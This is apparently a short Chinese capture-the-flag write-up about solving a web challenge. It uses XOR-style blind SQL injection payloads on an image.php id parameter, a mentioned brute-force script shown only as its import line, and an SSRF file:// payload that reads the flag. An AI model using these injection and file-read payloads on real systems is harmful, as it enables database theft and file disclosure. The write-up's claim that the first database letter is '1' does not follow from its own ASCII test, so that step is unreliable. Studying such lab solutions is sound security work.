异或注入或盲注及ssrf读取漏洞
通过信息收集,发现有username和password,但是尝试过都不能注入,然后再打开index.html文件,发现有一个
1 | http://url/image.php?id=3 |
推测此为注入点,然后使用异或注入
1 | /image.php?id=1^(ascii(substr((select(database())),1,1))>1)^1 |
发现有回显,然后更换参数,直到
1 | /image.php?id=1^(ascii(substr((select(database())),1,1))>99)^1 |
没有产生回显,可知数据库第一个字母为1
以此类推,按原理写一个脚本
1 | import requests |
得到表名为users
通过修改url的值继续爆破,得到密码值
而后登录账号,发现是ssrf读取文件漏洞,尝试构造
1 | file:// /flag |
得到flag